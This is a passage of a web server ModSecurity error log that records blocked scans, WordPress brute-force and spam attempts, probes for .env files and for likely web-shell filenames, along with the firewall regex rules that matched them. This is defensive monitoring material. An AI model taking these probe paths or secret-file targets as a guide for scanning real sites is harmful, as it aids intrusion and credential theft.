[Tue May 26 14:46:32.636341 2026] [security2:error] [pid 648203:tid 648344] [client 213.35.106.232:59993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVk8LEQDDtxJNiDrdTJjwAAAJA"]
[Tue May 26 14:46:33.248874 2026] [autoindex:error] [pid 648203:tid 648338] [client 205.210.31.40:0] AH01276: Cannot serve directory /home1/moesartc/public_html/drunktales.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:46:33.286698 2026] [security2:error] [pid 648203:tid 648423] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/node_modules/.env"] [unique_id "ahVk8bEQDDtxJNiDrdTJpAAAAN8"]
[Tue May 26 14:46:33.562432 2026] [security2:error] [pid 648203:tid 648458] [client 213.35.106.232:60264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVk8bEQDDtxJNiDrdTJqwAAAQI"]
[Tue May 26 14:46:34.190511 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/kyc/.env"] [unique_id "ahVk8rEQDDtxJNiDrdTJuwAAAQQ"]
[Tue May 26 14:46:34.397562 2026] [security2:error] [pid 648203:tid 648359] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk8bEQDDtxJNiDrdTJuAAAAJ8"]
[Tue May 26 14:46:34.424753 2026] [security2:error] [pid 648203:tid 648443] [client 216.26.232.220:49939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk8bEQDDtxJNiDrdTJpQAAAPM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:34.453775 2026] [security2:error] [pid 648203:tid 648376] [client 213.35.106.232:60383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVk8rEQDDtxJNiDrdTJxwAAALA"]
[Tue May 26 14:46:35.723877 2026] [security2:error] [pid 648203:tid 648359] [client 89.124.112.117:54529] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVk87EQDDtxJNiDrdTKAAAAAJ8"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:46:35.723996 2026] [security2:error] [pid 648203:tid 648359] [client 89.124.112.117:54529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVk87EQDDtxJNiDrdTKAAAAAJ8"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:46:36.337676 2026] [security2:error] [pid 648203:tid 648386] [client 12.50.107.220:50918] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "12.50.107.220" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVk9LEQDDtxJNiDrdTKGAAAALo"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:46:36.342352 2026] [security2:error] [pid 648203:tid 648386] [client 12.50.107.220:50918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVk9LEQDDtxJNiDrdTKGAAAALo"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:46:36.377503 2026] [security2:error] [pid 648203:tid 648454] [client 213.35.106.232:60519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahVk9LEQDDtxJNiDrdTKGQAAAP4"]
[Tue May 26 14:46:36.472803 2026] [security2:error] [pid 648203:tid 648437] [client 216.26.236.228:56535] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk87EQDDtxJNiDrdTJ9wAAAO0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:36.698742 2026] [security2:error] [pid 648203:tid 648304] [remote 79.116.52.1:32828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVk9LEQDDtxJNiDrdTKHwAA4GQ"]
[Tue May 26 14:46:36.819850 2026] [security2:error] [pid 648203:tid 648335] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk9LEQDDtxJNiDrdTKHAAAAIc"]
[Tue May 26 14:46:37.248548 2026] [security2:error] [pid 648203:tid 648460] [client 213.35.106.232:60900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahVk9bEQDDtxJNiDrdTKOwAAAQQ"]
[Tue May 26 14:46:37.439216 2026] [security2:error] [pid 648203:tid 648352] [client 20.12.190.196:55282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/Cap.php"] [unique_id "ahVk9bEQDDtxJNiDrdTKQgAAAJg"]
[Tue May 26 14:46:37.439321 2026] [security2:error] [pid 648203:tid 648352] [client 20.12.190.196:55282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/Cap.php"] [unique_id "ahVk9bEQDDtxJNiDrdTKQgAAAJg"]
[Tue May 26 14:46:38.216182 2026] [security2:error] [pid 648203:tid 648434] [client 114.119.150.190:21081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVk9rEQDDtxJNiDrdTKUgAAAOo"], referer: https://www.glorodrc.com/index.php?route=product/product&product_id=107
[Tue May 26 14:46:38.275378 2026] [security2:error] [pid 648203:tid 648454] [client 213.35.106.232:61063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahVk9rEQDDtxJNiDrdTKUwAAAP4"]
[Tue May 26 14:46:38.614512 2026] [security2:error] [pid 648203:tid 648412] [client 104.207.34.250:29045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk9bEQDDtxJNiDrdTKQwAAANQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:38.778233 2026] [security2:error] [pid 648203:tid 648350] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk9rEQDDtxJNiDrdTKVgAAAJY"]
[Tue May 26 14:46:39.121329 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.190.196:55177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVk97EQDDtxJNiDrdTKZQAAAPE"]
[Tue May 26 14:46:39.121470 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.190.196:55177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVk97EQDDtxJNiDrdTKZQAAAPE"]
[Tue May 26 14:46:39.184348 2026] [security2:error] [pid 648203:tid 648385] [client 213.35.106.232:61217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahVk97EQDDtxJNiDrdTKaQAAALk"]
[Tue May 26 14:46:39.874883 2026] [security2:error] [pid 648203:tid 648414] [client 216.26.224.130:37311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.224.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk97EQDDtxJNiDrdTKdAAAANY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:40.002820 2026] [security2:error] [pid 648203:tid 648452] [client 3.77.67.4:40292] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVk97EQDDtxJNiDrdTKfgAAAPw"], referer: http://ucdc.co.in/
[Tue May 26 14:46:40.192073 2026] [security2:error] [pid 648203:tid 648413] [client 213.35.106.232:61375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahVk-LEQDDtxJNiDrdTKgAAAANU"]
[Tue May 26 14:46:41.130737 2026] [security2:error] [pid 648203:tid 648396] [client 114.119.159.19:62497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ameritradeng.com"] [uri "/"] [unique_id "ahVk-bEQDDtxJNiDrdTKmQAAAMQ"], referer: http://ameritradeng.com/
[Tue May 26 14:46:41.141273 2026] [security2:error] [pid 648203:tid 648408] [client 213.35.106.232:61554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahVk-bEQDDtxJNiDrdTKmgAAANA"]
[Tue May 26 14:46:41.308285 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.5:50634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env"] [unique_id "ahVk-bEQDDtxJNiDrdTKoQAAAOM"]
[Tue May 26 14:46:41.527457 2026] [security2:error] [pid 648203:tid 648448] [client 209.99.189.98:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/images/images/cache.php"] [unique_id "ahVk-bEQDDtxJNiDrdTKqQAAAPg"], referer: www.google.com
[Tue May 26 14:46:41.722519 2026] [security2:error] [pid 648203:tid 648430] [client 20.12.190.196:55582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahVk-bEQDDtxJNiDrdTKqgAAAOY"]
[Tue May 26 14:46:41.722718 2026] [security2:error] [pid 648203:tid 648430] [client 20.12.190.196:55582] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahVk-bEQDDtxJNiDrdTKqgAAAOY"]
[Tue May 26 14:46:41.903555 2026] [security2:error] [pid 648203:tid 648381] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk-bEQDDtxJNiDrdTKqAAAALU"]
[Tue May 26 14:46:42.028049 2026] [security2:error] [pid 648203:tid 648395] [client 195.63.31.101:64713] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk-LEQDDtxJNiDrdTKlgAAAMM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:43.265457 2026] [security2:error] [pid 648203:tid 648445] [client 216.26.241.169:52995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.241.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk-7EQDDtxJNiDrdTKzQAAAPU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:43.586092 2026] [security2:error] [pid 648203:tid 648341] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk-7EQDDtxJNiDrdTK0AAAAI0"]
[Tue May 26 14:46:44.954484 2026] [security2:error] [pid 648203:tid 648380] [client 216.26.236.228:33757] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk_LEQDDtxJNiDrdTLEAAAALQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:45.227020 2026] [security2:error] [pid 648203:tid 648331] [remote 74.7.241.58:46682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVk_bEQDDtxJNiDrdTLLAAArX8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:46:45.883052 2026] [security2:error] [pid 648203:tid 648394] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk_bEQDDtxJNiDrdTLNAAAAMI"]
[Tue May 26 14:46:46.227461 2026] [security2:error] [pid 648203:tid 648383] [client 20.12.190.196:55568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVk_rEQDDtxJNiDrdTLUQAAALc"]
[Tue May 26 14:46:46.227612 2026] [security2:error] [pid 648203:tid 648383] [client 20.12.190.196:55568] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVk_rEQDDtxJNiDrdTLUQAAALc"]
[Tue May 26 14:46:46.900860 2026] [security2:error] [pid 648203:tid 648238] [remote 209.99.189.98:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/images/images/cache.php"] [unique_id "ahVk_rEQDDtxJNiDrdTLawAAiCI"], referer: www.google.com
[Tue May 26 14:46:46.932035 2026] [security2:error] [pid 648203:tid 648243] [remote 45.32.67.165:43000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVk_rEQDDtxJNiDrdTLZwAA4Cc"]
[Tue May 26 14:46:47.018982 2026] [security2:error] [pid 648203:tid 648443] [client 213.35.106.232:61725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVk_7EQDDtxJNiDrdTLcQAAAPM"]
[Tue May 26 14:46:47.230045 2026] [security2:error] [pid 648203:tid 648434] [client 216.26.227.186:22231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk_rEQDDtxJNiDrdTLTAAAAOo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:47.258598 2026] [security2:error] [pid 648203:tid 648407] [client 20.12.190.196:55247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-indx.php"] [unique_id "ahVk_7EQDDtxJNiDrdTLewAAAM8"]
[Tue May 26 14:46:47.258733 2026] [security2:error] [pid 648203:tid 648407] [client 20.12.190.196:55247] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-indx.php"] [unique_id "ahVk_7EQDDtxJNiDrdTLewAAAM8"]
[Tue May 26 14:46:47.469884 2026] [autoindex:error] [pid 648203:tid 648418] [client 45.148.10.204:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:46:48.169404 2026] [security2:error] [pid 648203:tid 648412] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk_7EQDDtxJNiDrdTLlwAAANQ"]
[Tue May 26 14:46:48.462274 2026] [security2:error] [pid 648203:tid 648458] [client 65.111.28.81:45191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.28.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlALEQDDtxJNiDrdTLqQAAAQI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:49.890454 2026] [core:error] [pid 648203:tid 648373] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:46:49.890476 2026] [core:error] [pid 648203:tid 648373] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:46:49.995313 2026] [security2:error] [pid 648203:tid 648451] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlAbEQDDtxJNiDrdTL7AAAAPs"]
[Tue May 26 14:46:49.997646 2026] [core:error] [pid 648203:tid 648347] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:46:49.997681 2026] [core:error] [pid 648203:tid 648347] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:46:50.719067 2026] [security2:error] [pid 648203:tid 648363] [client 45.3.54.94:65061] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlAbEQDDtxJNiDrdTL7QAAAKM"], referer: https://velanstore.ca/wp-login.php
